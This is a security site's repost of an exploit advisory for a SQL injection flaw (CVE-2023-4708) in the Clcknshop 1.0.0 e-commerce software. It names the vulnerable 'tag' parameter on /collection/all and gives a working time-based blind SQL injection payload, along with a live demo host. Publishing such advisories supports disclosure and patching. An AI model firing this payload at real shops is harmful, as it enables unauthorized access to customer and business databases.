Home Tools Exploits & CVE's Clcknshop 1.0.0 SQL Injection

Clcknshop 1.0.0 SQL Injection

September 3, 2023

292

Authored by CraCkEr

Clcknshop version 1.0.0 suffers from a remote SQL injection vulnerability.

advisories | CVE-2023-4708

# Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4708
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /collection/all

GET parameter 'tag' is vulnerable to SQL Injection

https://website/collection/all?tag=[SQLi]

---
Parameter: tag (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---


[-] Done

Clcknshop 1.0.0 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Gambio Online Webshop 4.9.2.0 Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Adtran Personal Phone Manager 10.8.1 Cross Site Scripting

TIBCO JasperReports Server 8.0.2 Community Edition Code Execution

WhatACart 2.0.7 Cross Site Scripting